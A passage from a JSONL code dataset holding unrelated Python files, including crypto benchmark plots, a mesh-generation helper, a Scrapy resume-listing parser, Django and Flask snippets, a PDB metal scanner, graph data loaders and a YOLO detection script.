0.7818869342)\ncbc_dec_cpb_stdev = (0.0614463588, 0.1058349596, 0.0276899868)\ngcm_dec_cpb_mean = (0.6296174819, 0.7112930339, 0.8128298198)\ngcm_dec_cpb_stdev = (0.1029567728, 0.0579556255, 0.1023129858)\n\n# SHA Results\nsha_cpb_mean = (6.4715533278, 4.3574680072, 4.3262215193)\nsha_cpb_stdev = (0.3495392566, 0.2725921272, 0.1503878577)\n\n# RSA Results\nrsa_sign_cpb_mean = (5.6730520495, 116.3897036042, 614.0089232005)\necc_sign_cpb_mean = (0.8888893411, 2.0287472943, 4.3417407161)\nrsa_sign_cpb_stdev = (0.6725152461, 3.6515501268, 12.714253515)\necc_sign_cpb_stdev = (0.1100842359, 0.2774615172, 0.6001073186)\n\nrsa_ver_cpb_mean = (0.1144054453, 0.6320163672, 2.562243)\necc_ver_cpb_mean = (0.992241763, 2.2594288125, 4.5881856771)\nrsa_ver_cpb_stdev = (0.0142365226, 0.0295835435, 0.2066347502)\necc_ver_cpb_stdev = (0.1755392219, 0.2562180472, 0.2894840873)\n\ndef plot_aes_operation(ax1,m1,m2,m3,s1,s2,s3,yaxis=True):\n N = 3\n ind = np.arange(N) # the x locations for the groups\n width = 0.25 # the width of the bars\n buff = width / 3.5\n rects1 = ax1.bar(ind + buff, m1, width,\n color='white', yerr=s1, hatch='..', ecolor='black', edgecolor='dimgray')\n rects2 = ax1.bar(ind + 1.1 * width + buff, m2, width,\n color='silver', yerr=s2, hatch='//', ecolor='black', edgecolor='dimgray')\n rects3 = ax1.bar(ind + 2.2 * width + buff, m3, width,\n color='gray', yerr=s3, hatch='++', ecolor='black', edgecolor='dimgray')\n if (yaxis):\n ax1.set_ylabel('Cycles/Byte')\n ax1.set_xlabel('Security Strength')\n ax1.set_xticks(ind + width * 2)\n ax1.set_ylim([0,3.5])\n ax1.set_xticklabels(('L', 'M', 'H'))\n ax1.yaxis.grid(True)\n\ndef singles_plot_aes():\n plt.close('all')\n f, ax = plt.subplots(1,1, figsize=(5,3))\n plot_aes_operation(ax, cbc_enc_cpb_mean, ctr_cpb_mean, gcm_enc_cpb_mean,\n cbc_enc_cpb_stdev, ctr_cpb_stdev, gcm_enc_cpb_stdev)\n #plot_aes_operation(ax, cbc_dec_cpb_mean, ctr_cpb_mean, 
gcm_dec_cpb_mean,\n # cbc_dec_cpb_stdev, ctr_cpb_stdev, gcm_dec_cpb_stdev, False)\n plt.show()\n\n\ndef plaot_aes():\n plt.close('all')\n f, (ax1, ax2) = plt.subplots(1,2, sharey = True, figsize=(10,3))\n\n plot_aes_operation(ax1, cbc_enc_cpb_mean, ctr_cpb_mean, gcm_enc_cpb_mean,\n cbc_enc_cpb_stdev, ctr_cpb_stdev, gcm_enc_cpb_stdev)\n plot_aes_operation(ax2, cbc_dec_cpb_mean, ctr_cpb_mean, gcm_dec_cpb_mean,\n cbc_dec_cpb_stdev, ctr_cpb_stdev, gcm_dec_cpb_stdev, False)\n\n plt.legend(labels=[\"CBC\", \"CTR\", \"GCM\"],\n ncol=1, loc=7, bbox_to_anchor=(1.5,0.5))\n\n f.subplots_adjust(bottom=0.25,hspace=0.1)\n #f.subplots_adjust(right=5.25)\n #f.tight_layout()\n plt.show()\n\ndef plot_sha2(m,s):\n N = 3\n ind = np.arange(N) # the x locations for the groups\n width = 0.6 # the width of the bars\n buff = 0.175 #width / 1.5\n fig, ax = plt.subplots(figsize=(3,2.5))\n ax.bar(ind + buff, m, width,\n color='silver', yerr=s, ecolor='black', edgecolor='dimgray')\n\n #ax.set_xticks(ind + width * 2)\n ax.yaxis.grid(True)\n ax.set_ylabel('Cycles/Byte')\n ax.set_xticks(ind + buff + width/2)\n ax.set_xticklabels(('L', 'M', 'H'))\n ax.set_xlabel('Security Strength')\n #ax.legend((rects1[0], rects2[0], rects3[0]), ('SHA-256', 'SHA-384', 'SHA-512'))\n plt.show()\n\n\ndef plot_digi_sig():\n plt.close('all')\n f, (ax1, ax2) = plt.subplots(1,2, sharey = True, figsize=(10,3))\n\n plot_sig_op(ax1, rsa_sign_cpb_mean, ecc_sign_cpb_mean, rsa_sign_cpb_stdev, ecc_sign_cpb_stdev, True)\n plot_sig_op(ax2, rsa_ver_cpb_mean, ecc_ver_cpb_mean, rsa_ver_cpb_stdev, ecc_ver_cpb_stdev, True)\n\n plt.legend(labels=[\"RSA\", \"ECC\"],\n ncol=1, loc=7, bbox_to_anchor=(1.5,0.5))\n\n f.subplots_adjust(bottom=0.25,hspace=0.1)\n #f.subplots_adjust(right=5.25)\n #f.tight_layout()\n plt.show()\n\ndef plot_sig_op(ax,m1,m2,s1,s2,yaxis=True):\n N = 3\n ind = np.arange(N) # the x locations for the groups\n width = 0.25 # the width of the bars\n buff = width / 3.5\n rects1 = ax.bar(ind*0.675 + buff, m1, width,\n color='white', yerr=s1, hatch='..', ecolor='black', edgecolor='dimgray')\n rects2 = ax.bar(ind*0.675 + 1.1 * width + buff, m2, width,\n color='silver', yerr=s2, hatch='//', ecolor='black', edgecolor='dimgray')\n if (yaxis):\n ax.set_ylabel('Million of Cycles')\n ax.set_xticks(ind*0.675 + width*1.5)\n ax.set_ylim([0,10])\n ax.set_xticklabels(('L', 'M', 'H'))\n ax.yaxis.grid(True)\n ax.set_xlabel('Security Strength')\n\n\ndef plot_sig(m1,m2,s1,s2,yaxis=True,sharedY=True):\n N = 2\n ind = np.arange(N) # the x locations for the groups\n width = 0.25 # the width of the bars\n buff = width / 3.5\n\n if sharedY:\n fig, ax = plt.subplots(figsize=(4,3), sharey='row')\n else:\n fig, ax = plt.subplots(figsize=(4,3))\n\n rects1 = ax.bar(ind*0.675 + buff, m1, width,\n color='white', yerr=s1, hatch='..', ecolor='black', edgecolor='dimgray')\n rects2 = ax.bar(ind*0.675 + 1.1 * width + buff, m2, width,\n color='silver', yerr=s2, hatch='//', ecolor='black', edgecolor='dimgray')\n\n # add some text for labels, title and axes ticks\n #ax.set_title('AES Encryption Cycles per Byte (lower the better)')\n if (yaxis):\n ax.set_ylabel('Megacycles/Operation')\n ax.set_xticks(ind*0.675 + width*1.5)\n ax.set_ylim([0,10])\n ax.set_xticklabels(('keys-low', 'keys-medium', 'keys-high'))\n ax.yaxis.grid(True)\n #ax.grid(True)\n #ax.legend((rects1[0], rects2[0]), ('RSA', 'ECDSA'))\n\n return fig\n\ndef singles_plot_digi():\n plt.close('all')\n f, ax = plt.subplots(1,1, figsize=(3.5,3))\n\n #plot_sig_op(ax, rsa_sign_cpb_mean, ecc_sign_cpb_mean, rsa_sign_cpb_stdev, 
ecc_sign_cpb_stdev, True)\n plot_sig_op(ax, rsa_ver_cpb_mean, ecc_ver_cpb_mean, rsa_ver_cpb_stdev, ecc_ver_cpb_stdev, False)\n\n #f.subplots_adjust(right=5.25)\n #f.tight_layout()\n plt.show()\n\n\ndef main():\n #singles_plot_aes()\n #plot_sha2(sha_cpb_mean, sha_cpb_stdev)\n singles_plot_digi()\n\n\n\n\n\nif __name__==\"__main__\":\n main()\n","repo_name":"stefan-contiu/cloud-crypto-benchmark","sub_path":"macro-bench/micro_plots.py","file_name":"micro_plots.py","file_ext":"py","file_size_in_byte":6617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"29083001434","text":"from __future__ import print_function\n\nimport os\nimport numpy as np\nimport time\nimport tempfile\n\nimport six\nif six.PY2:\n import cPickle as pickle\nelse:\n import pickle\n\nfrom six.moves.queue import Empty as QueueEmpty\n\nimport petram.debug as debug\ndprint1, dprint2, dprint3 = debug.init_dprints('GeomSequenceOperator')\n\ntest_thread = False\n\nclass MeshSequenceOperator():\n def __init__(self, **kwargs):\n self.mesh_sequence = []\n #self._prev_sequence = []\n\n #def __del__(self):\n # self.terminate_child()\n\n def clean_queue(self, p):\n if self.use_mp:\n p.task_q.close()\n p.q.close()\n p.task_q.cancel_join_thread()\n p.q.cancel_join_thread()\n\n def terminate_child(self, p):\n if p.is_alive():\n if self.use_mp:\n self.clean_queue(p) \n p.terminate()\n else:\n p.task_q.put((-1, None))\n p.task_q.join()\n\n def add(self, name, *gids, **kwargs):\n '''\n add mesh command\n '''\n\n if name == 'extrude_face':\n self.mesh_sequence.append(['copyface', (gids[1], gids[2]), kwargs])\n elif name == 'revolve_face':\n\n kwargs['revolve'] = True\n kwargs['volume_hint'] = gids[0]\n self.mesh_sequence.append(['copyface', (gids[1], gids[2]), kwargs])\n else:\n pass\n self.mesh_sequence.append([name, gids, kwargs])\n \n def count_sequence(self):\n return len(self.mesh_sequence)\n \n def clear(self):\n self.mesh_sequence = []\n \n \n def run_generater(self, brep_input, msh_file, kwargs,\n finalize=False, dim=3, progressbar=None):\n\n ''' \n kwargs = {'CharacteristicLengthMax': self.clmax,\n 'CharacteristicLengthMin': self.clmin,\n 'EdgeResolution': self.res,\n 'MeshAlgorithm': self.algorithm,\n 'MeshAlgorithm3D': self.algorithm3d,\n 'MeshAlgorithmR': self.algorithmr,\n 'MaxThreads': self.maxthreads,\n 'use_profiler': self.use_profiler,\n 'use_expert_mode': self.use_expert_mode,\n 'gen_all_phys_entity': self.gen_all_phys_entity,\n 'trash': self.trash,\n 'edge_tss': edge_tss}\n '''\n from petram.mesh.gmsh_mesh_wrapper import (GMSHMeshGenerator,\n GMSHMeshGeneratorTH)\n\n if progressbar is None or globals()['test_thread']:\n self.use_mp = False\n p = GMSHMeshGeneratorTH()\n else:\n self.use_mp = True\n p = GMSHMeshGenerator()\n p.start()\n\n args=(brep_input, msh_file, self.mesh_sequence, dim,\n finalize, kwargs)\n\n p.task_q.put((1, args))\n\n istep = 0\n\n while True:\n try:\n ret = p.q.get(True, 1)\n if ret[0]:\n break\n if progressbar is not None:\n istep += 1\n progressbar.Update(istep, newmsg=ret[1])\n else:\n print(\"Mesh Generator : Step = \" +\n str(istep) + \" : \" + ret[1])\n\n except QueueEmpty:\n if not p.is_alive():\n if progressbar is not None:\n progressbar.Destroy()\n p.q.close()\n p.q.cancel_join_thread()\n assert False, \"Child Process Died\"\n break\n time.sleep(1.)\n if progressbar is not None:\n import wx\n wx.Yield()\n if progressbar.WasCancelled():\n self.terminate_child(p)\n progressbar.Destroy()\n assert False, \"Mesh Generation Aborted\"\n\n 
time.sleep(0.01)\n\n self.terminate_child(p)\n\n try:\n max_dim, done, msh_output = ret[1]\n assert msh_output is not None, \"failed to generate mesh\"\n from petram.geom.read_gmsh import read_pts_groups, read_loops\n\n if progressbar is not None:\n progressbar.Update(istep, newmsg=\"Reading mesh file for rendering\")\n else:\n print(\"Reading mesh file for rendering\")\n\n import gmsh \n gmsh.open(msh_output)\n\n ptx, cells, cell_data = read_pts_groups(gmsh,\n finished_lines=done[1],\n finished_faces=done[2])\n\n data = ptx, cells, {}, cell_data, {}\n \n except:\n if progressbar is not None:\n progressbar.Destroy()\n raise\n \n if progressbar is not None:\n progressbar.Destroy()\n\n return max_dim, done, data, msh_output\n","repo_name":"piScope/PetraM_Geom","sub_path":"petram/mesh/mesh_sequence_operator.py","file_name":"mesh_sequence_operator.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70813437681","text":"def summing(first, digit, last):\r\n if first.isupper():\r\n digit /= ord(first) - 64\r\n elif first.islower():\r\n digit *= ord(first) - 96\r\n if last.isupper():\r\n digit -= ord(last) - 64\r\n elif last.islower():\r\n digit += ord(last) - 96\r\n return digit\r\n\r\n\r\ndef things(text):\r\n total = 0\r\n for word in text:\r\n word = word.strip()\r\n first_letter = word[0]\r\n last_letter = word[-1]\r\n digit = int(word[1:-1])\r\n total += summing(first_letter, digit, last_letter)\r\n return total\r\n\r\n\r\ntext = input().split()\r\nprint(f\"{things(text):.2f}\")\r\n","repo_name":"kokolino1015/Softuni-Python","sub_path":"fund/Text Processing/Ex.L8.08.py","file_name":"Ex.L8.08.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2284156340","text":"#!/usr/bin/python3\n'''A student will not be allowed to sit in exam if his/her attendance is less than 75% and allow\nstudent to sit if he/she has medical cause upto 65%. Ask user if he/she has medical cause or\nnot ( 'Y' or 'N' ) and print accordingly.'''\n\n\nprint(\"Total_Working_Days = 100\")\n\nDays = int(input(\"Days You Came: \"))\n\nPerc = int((Days/100)*100)\nmed = []\nprint(Perc)\nif Perc>=75:\n\tprint(\"you alowed to write a exam\")\nif Perc<=74:\n \tmed = input(\"Do you have Medical Cert? 
yes/no: \")\nif med == ('yes'):\n\tif Perc>=65:\n\t\tprint('go and write Exam')\n\telse:\n\t\tprint(\"your att Perc is below 65 so you don't allow to write an exam\")\nelif med==('no'):\n\tprint(\"You not allowed to write a exam :(\")","repo_name":"0xsakthi/Python-Problems-For-Begginers","sub_path":"Branching/attenedence.py","file_name":"attenedence.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"12925839308","text":"import scrapy\r\nimport pandas as pd\r\n\r\nclass Sandhi(scrapy.Spider):\r\n name = \"sandhi\"\r\n start_urls = [\"file:///Users/prathameshmadur/Downloads/JS/sandhi.html\"]\r\n\r\n def parse(self, response):\r\n\r\n counter = 0\r\n data = []\r\n columns=['SerialNo', 'currentCompany', 'currentLocation', 'designation', 'downloadLink', 'downloadName', 'experience', 'name',\r\n 'preferedLocation', 'prevComapny', 'prevDesignation', 'qualification', 'resumeViewed', 'salary', 'skills']\r\n\r\n for responseList in response.css('.rs_list'):\r\n counter += 1\r\n name = responseList.css('.rs_2 > .black > a::text').extract_first()\r\n designation = responseList.css('.rs_2 > .mt10::text').extract_first().replace(\"\\xa0\", \"\")\r\n company = responseList.css('.rs_2 > .mt2::text').extract()[0].replace(\"\\xa0\", \"\")\r\n prevDesignation = responseList.css('.rs_2 > .mt2::text').extract()[1].replace(\"\\xa0\", \"\")\r\n prevComapny = responseList.css('.rs_2 > .mt2::text').extract()[2].replace(\"\\xa0\", \"\")\r\n skills = responseList.css('.rs_2 > .mt15::text').extract_first().replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\")\r\n experience = responseList.css('.rs_3 > p::text').extract()[0].replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"|\", \"\")\r\n salary = responseList.css('.rs_3 > p::text').extract()[1].replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"|\", \"\")\r\n qualification = responseList.css('.rs_3 > .mt2::text').extract()[0].replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\")\r\n currentLocation = responseList.css('.rs_3 > .mt2::text').extract()[1].replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\")\r\n preferedLocation = responseList.css('.rs_3 > .mt2::text').extract()[2].replace(\"\\xa0\", \"\").replace(\"\\r\", \"\").replace(\"\\n\", \"\")\r\n resumeViewed = responseList.css('.rs_3 > .mt15 > b::text').extract()[1]\r\n downloadLink = responseList.css('.rs_3 > .mt10 > a::attr(href)').extract_first()\r\n downloadName = downloadLink.replace(\"https://www.jobsandhi.com/members/downloadresume/\", \"\")\r\n\r\n item = { \"name\": name,\r\n \"designation\": designation,\r\n \"currentCompany\": company,\r\n \"prevDesignation\": prevDesignation,\r\n \"prevComapny\": prevComapny,\r\n \"skills\": skills,\r\n \"experience\": experience,\r\n \"salary\": salary,\r\n \"qualification\": qualification,\r\n \"currentLocation\": currentLocation,\r\n \"preferedLocation\": preferedLocation,\r\n \"resumeViewed\": resumeViewed,\r\n \"downloadLink\": downloadLink,\r\n \"downloadName\": downloadName,\r\n \"Serialno\": counter}\r\n\r\n data.append(item)\r\n\r\n df = pd.DataFrame(data)\r\n df.columns = columns\r\n df.to_csv('resumes.csv')\r\n #df.to_csv('resumes.csv', mode='a', 
header=False)\r\n","repo_name":"iamprathamesh/Jobsandhi-crawler","sub_path":"JobsandhiCrawler.py","file_name":"JobsandhiCrawler.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8392024464","text":"\"\"\"urlconf for the base application\"\"\"\n\nfrom django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^login$', views.login_user, name='login_user'),\n url(r'^logout$', views.logout_user, name='logout_user'),\n url(r'^registration$', views.registration_user, name='registration_user'),\n url(r'^upload_images$', views.upload_images, name='update_images'),\n url(r'^search_by_image$', views.search_by_image, name='search_by_image'),\n url(r'^search$', views.search, name='search'),\n url(r'^click_like$', views.click_like, name='click_like'),\n\turl(r'^prepare_images$', views.prepare_images, name='prepare_images'),\n]\n","repo_name":"CodingYue/Fudan-software-engineering-development","sub_path":"web/apps/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71580408881","text":"from django.forms import ModelForm, DateInput\nfrom django.utils import timezone\nfrom cal.models import Event\n\n\nclass EventForm(ModelForm):\n class Meta:\n model = Event\n # datetime-local is a HTML5 input type, format to make date time show on fields\n widgets = {\n 'start_time': DateInput(attrs={'type': 'datetime-local'}, format='%Y-%m-%dT%H:%M'),\n 'end_time': DateInput(attrs={'type': 'datetime-local'}, format='%Y-%m-%dT%H:%M'),\n }\n fields = ['host', 'zoom_link', 'start_time', 'end_time']\n\n def __init__(self, *args, **kwargs):\n super(EventForm, self).__init__(*args, **kwargs)\n # input_formats parses HTML5 datetime-local input to datetime field\n self.fields['start_time'].input_formats = ('%Y-%m-%dT%H:%M',)\n self.fields['end_time'].input_formats = ('%Y-%m-%dT%H:%M',)\n self.fields['host'].disabled = (True)\n\n def clean(self):\n super(EventForm, self).clean()\n\n start_time = self.cleaned_data.get('start_time')\n end_time = self.cleaned_data.get('end_time')\n\n if (start_time > end_time):\n self._errors['start_time'] = self.error_class(\n ['Start time cannot be later than end time!'])\n if (start_time <= timezone.now()):\n self._errors['start_time'] = self.error_class(\n ['Start time cannot be earlier than current time!'])\n if (end_time <= timezone.now()):\n self._errors['end_time'] = self.error_class(\n ['End time cannot be earlier than current time!'])\n\n return self.cleaned_data\n","repo_name":"Asuka-neko/MeetCIT","sub_path":"MeetCIT/cal/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"20905000618","text":"from pathlib import Path\nimport numpy as np\nimport torch\nfrom torch_geometric.loader import DataLoader\nfrom ..ood_dataset import HEP_Pileup_Shift, HEP_Signal_Shift, QMOF, Drug3d\nfrom ..utils import utils\n\n\ndef get_data_loaders(dataset_name, config, shift_config, seed):\n root_dir = (Path(config['dir_config']['dataset_dir']) / f'{dataset_name}').as_posix()\n batch_size = config['optimizer']['batch_size']\n data_config = config['data']\n shift_name = shift_config['shift_name']\n setting = data_config['setting']\n if dataset_name == 'Track':\n assert shift_name in 
[\"pileup\", \"signal\"]\n Dataset = HEP_Pileup_Shift if shift_name == 'pileup' else HEP_Signal_Shift\n elif dataset_name == 'QMOF':\n assert shift_name == 'fidelity'\n Dataset = QMOF\n elif dataset_name == 'DrugOOD-3D':\n assert shift_name in [\"size\", \"scaffold\", \"assay\"]\n Dataset = Drug3d\n else:\n raise NotImplementedError\n dataset = Dataset(root_dir, data_config, shift_config, seed)\n\n def process(dataset):\n if dataset.dataset_name == \"DrugOOD-3D\":\n dataset.data.y = dataset.data.y.view(-1, 1)\n dataset.data.x[dataset.data.x == -1] = 13\n if dataset.dataset_name == \"QMOF\":\n dataset.data.y = dataset.data.y.view(-1, 1)\n return dataset\n\n dataset = process(dataset) # necessary for DrugOOD-3D\n loaders = get_ood_data_loader(batch_size, dataset=dataset, idx_split=dataset.idx_split, setting=setting)\n\n if data_config['setting'] == \"O-Feature\":\n loaders['train_source'] = utils.ForeverDataIterator(loaders['train_source'])\n loaders['train_target'] = utils.ForeverDataIterator(loaders['train_target'])\n return loaders, dataset\n\n\ndef get_ood_data_loader(batch_size, dataset, idx_split, setting):\n data_loader = dict()\n for item in idx_split.keys():\n shuffling = True if item.split('_')[0] == 'train' else False\n drop_last = True if (item.split('_')[0] == 'train' and setting == \"O-Feature\") else False\n batch_size = 32 if item in ['ood_val', 'ood_test'] and dataset.dataset_name == 'Track' else batch_size\n loader = DataLoader(dataset[idx_split[item]], batch_size=batch_size, shuffle=shuffling, follow_batch=None,\n drop_last=drop_last)\n data_loader[item] = loader\n return data_loader\n","repo_name":"Graph-COM/GDL_DS","sub_path":"src/utils/get_data_loaders.py","file_name":"get_data_loaders.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"38383469455","text":"from flask import Flask\nfrom flask import request\nimport time\nimport test_client as tc\napp = Flask(__name__)\n\n# the queue holds multiple orders\nqueue = []\n\n# a queue structure holding the next instructions for the robot\ncommands = []\n\n# get commands from file and load into commands\ndef get_commands(n):\n f = open('commands')\n lines = f.readlines()\n f.close()\n\n line = lines[n]\n data = line.split(',')\n commands = data \n \n# send a message to the robot depending on the command\ndef move_robot(c):\n if c == 'f':\n tc.send_message('follow_line_until_intersection')\n if c == 'r':\n tc.send_message('turn_right')\n if c == 'l':\n tc.send_message('turn_left')\n if c == 't':\n tc.send_message('turn_around')\n\n# :)\n@app.route('/')\ndef hello_world():\n return 'This is group 13\\'s web server for the their robot, no touchy touchy'\n\n\n# Endpoint for the connection from the app\n@app.route('/APP/', methods=['POST'])\ndef APP():\n data = request.form.get('seat')\n\n # verify data is of type int\n try:\n data = int(data)\n except:\n data = 0\n\n # don't give invalid seat values\n data = data % 6\n\n # verify data is not Nonetype (already check but just to be safe)\n if data is not None:\n\n # add seat to queue\n queue.append(data)\n\n # if there are no commands in the command queue get the next set of commands\n if len(commands) == 0:\n get_commands(data)\n return \"success!\"\n return \"failure!\"\n\n# Endpoint for connections from the EV3\n@app.route('/EV3/', methods=['POST'])# finishes an action\ndef EV3():\n # Check the command queue is non-empty\n if len(commands) > 0:\n move_robot(command[0])\n 
commands.pop(0)\n else:\n # when debugging stops crash if queue is empty\n try:\n queue.pop(0)\n if len(queue) > 0:\n get_commands(queue[0])\n except:\n return \"failure\"\n \n return \"received\"\n\n# run the flask app\nif __name__ == '__main__':\n app.run('0.0.0.0', port=80)\n","repo_name":"sdpteam13/BarBender","sub_path":"RASPI/main_server.py","file_name":"main_server.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71087912561","text":"from __future__ import print_function\nimport multiprocessing as mp\nimport glob\nimport mdtraj as md\n\npdbpath = '/cbio/jclab/share/pdb/*/*.ent.gz'\nppn = 32\nmetal_name = 'ZN'\n\ndef metal_scanner(file):\n \n contains_metal = [False, file]\n try:\n traj = md.load_pdb(file)\n except:\n return [None, file] \n \n if [atom for atom in traj.top.atoms if atom.name == 'ZN' and atom.residue.name == 'ZN']:\n contains_metal[0] = True\n \n print(contains_metal) \n return contains_metal\n \ndef database_analyzer(pdbpath):\n \n database_analyzer_results = [0, []]\n #files_wo_metal = 0\n \n for contains_metal in pool.map(metal_scanner, glob.iglob(pdbpath)):\n if contains_metal[0] == True:\n database_analyzer_results[0] += 1\n database_analyzer_results[1].append(contains_metal[1])\n # elif contains_metal == False:\n # files_wo_metal += 1 \n \n return database_analyzer_results \n \n# Multiprocess set-up\nif __name__ == '__main__':\n \n pool = mp.Pool(processes = ppn)\n database_analyzer_results = database_analyzer(pdbpath) \n \n \n# write results\nwith open('metal_scanner_by_mdtraj_results_FILES.txt', 'w') as f:\n #f.write('All files analyzed:\\n') \n #f.write(str(files_w_metal + files_wo_metal))\n #f.write('\\n')\n #f.write('All files in the database:\\n')\n #f.write(str(len(glob.glob(pdbpath))))\n #f.write('\\n')\n f.write('Files containing %s: \\n' % metal_name)\n f.write(str(database_analyzer_results[0]))\n f.write('\\n')\n f.write('File paths:\\n')\n for line in database_analyzer_results[1]:\n f.write(str(line))\n f.write('\\n')\n \n \n","repo_name":"choderalab/PDBAnalyzer","sub_path":"metal_scanner/by_mdtraj/metal_scanner_by_mdtraj_files.py","file_name":"metal_scanner_by_mdtraj_files.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31003284909","text":"from time import sleep\nfrom threading import Thread\nimport client, middleware, server\n\nhost = \"127.0.0.1\"\nserverPort = 8000\nclientPort = 8001\nchunkSize = 2048\n\nserver = Thread(target = server.run, args=(host, serverPort, chunkSize,))\nmiddleware = Thread(target = middleware.run, args=(host, clientPort, serverPort, chunkSize,))\nclient = Thread(target = client.run, args=(host, clientPort, chunkSize,))\n\nserver.start()\nsleep(1)\nmiddleware.start()\nsleep(1)\nclient.start()\n","repo_name":"KruglovDmitry/DistributedApplications","sub_path":"Lab_1/Lab_1/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32712072360","text":"#! 
/usr/bin/env python\n\"\"\"Run a YOLO_v2 style detection model on test images.\"\"\"\nimport argparse\nimport colorsys\nimport imghdr\nimport os\nimport random\n\nimport numpy as np\nfrom keras import backend as K\nfrom keras.models import load_model\nfrom PIL import Image, ImageDraw, ImageFont\nfrom models.YAD2K.yad2k.models.keras_yolo import yolo_eval, yolo_head\n\nimport cv2\n\ndef yolo_detect(image_url):\n model_path = 'models/YAD2K/model_data/yolo.h5'\n anchors_path = 'models/YAD2K/model_data/yolo_anchors.txt'\n classes_path = 'models/YAD2K/model_data/coco_classes.txt'\n score_threshold = 0.3\n iou_threshold = 0.5\n\n sess = K.get_session()\n\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n\n with open(anchors_path) as f:\n anchors = f.readline()\n anchors = [float(x) for x in anchors.split(',')]\n anchors = np.array(anchors).reshape(-1, 2)\n\n yolo_model = load_model(model_path)\n\n # Verify model, anchors, and classes are compatible\n num_classes = len(class_names)\n num_anchors = len(anchors)\n\n # Check if model is fully convolutional, assuming channel last order.\n model_image_size = yolo_model.layers[0].input_shape[1:3]\n is_fixed_size = model_image_size != (None, None)\n\n # Generate colors for drawing bounding boxes.\n hsv_tuples = [(x / len(class_names), 1., 1.)\n for x in range(len(class_names))]\n colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n colors = list(\n map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),\n colors))\n random.seed(10101) # Fixed seed for consistent colors across runs.\n random.shuffle(colors) # Shuffle colors to decorrelate adjacent classes.\n random.seed(None) # Reset seed to default.\n\n # Generate output tensor targets for filtered bounding boxes.\n yolo_outputs = yolo_head(yolo_model.output, anchors, len(class_names))\n\n input_image_shape = K.placeholder(shape=(2, ))\n boxes, scores, classes = yolo_eval(\n yolo_outputs,\n input_image_shape,\n score_threshold = score_threshold,\n iou_threshold = iou_threshold)\n\n\n pre_image = cv2.imread(\".\" + image_url)\n pre_image = cv2.cvtColor(pre_image, cv2.COLOR_BGR2RGB)\n src_image_pil=Image.fromarray(pre_image)\n pil_normalize = src_image_pil.convert('RGB')\n image = pil_normalize\n\n if is_fixed_size: # TODO: When resizing we can use minibatch input.\n resized_image = image.resize(\n tuple(reversed(model_image_size)), Image.BICUBIC)\n image_data = np.array(resized_image, dtype='float32')\n else:\n # Due to skip connection + max pooling in YOLO_v2, inputs must have\n # width and height as multiples of 32.\n new_image_size = (image.width - (image.width % 32),\n image.height - (image.height % 32))\n resized_image = image.resize(new_image_size, Image.BICUBIC)\n image_data = np.array(resized_image, dtype='float32')\n #print(image_data.shape)\n\n image_data /= 255.\n image_data = np.expand_dims(image_data, 0) # Add batch dimension.\n\n out_boxes, out_scores, out_classes = sess.run(\n [boxes, scores, classes],\n feed_dict={\n yolo_model.input: image_data,\n input_image_shape: [image.size[1], image.size[0]],\n K.learning_phase(): 0\n })\n\n font = ImageFont.truetype(\n font='models/YAD2K/font/FiraMono-Medium.otf',\n size=np.floor(3e-2 * image.size[1] + 0.5).astype('int32'))\n thickness = (image.size[0] + image.size[1]) // 300\n\n for i, c in reversed(list(enumerate(out_classes))):\n #print(i, \"2\")\n predicted_class = class_names[c]\n box = out_boxes[i]\n score = out_scores[i]\n\n label = '{} 
{:.2f}'.format(predicted_class, score)\n\n draw = ImageDraw.Draw(image)\n label_size = draw.textsize(label, font)\n\n top, left, bottom, right = box\n top = max(0, np.floor(top + 0.5).astype('int32'))\n left = max(0, np.floor(left + 0.5).astype('int32'))\n bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n #print(label, (left, top), (right, bottom))\n\n if top - label_size[1] >= 0:\n text_origin = np.array([left, top - label_size[1]])\n else:\n text_origin = np.array([left, top + 1])\n\n # My kingdom for a good redistributable image drawing library.\n\n for i in range(thickness):\n draw.rectangle(\n [left + i, top + i, right - i, bottom - i],\n outline=colors[c])\n draw.rectangle(\n [tuple(text_origin), tuple(text_origin + label_size)],\n fill=colors[c])\n draw.text(text_origin, label, fill=(0, 0, 0), font=font)\n del draw\n\n yolo_url= \".\" + image_url.rsplit('.', 1)[0] + \"_yolo.\" + image_url.rsplit('.', 1)[1]\n #print(yolo_url)\n 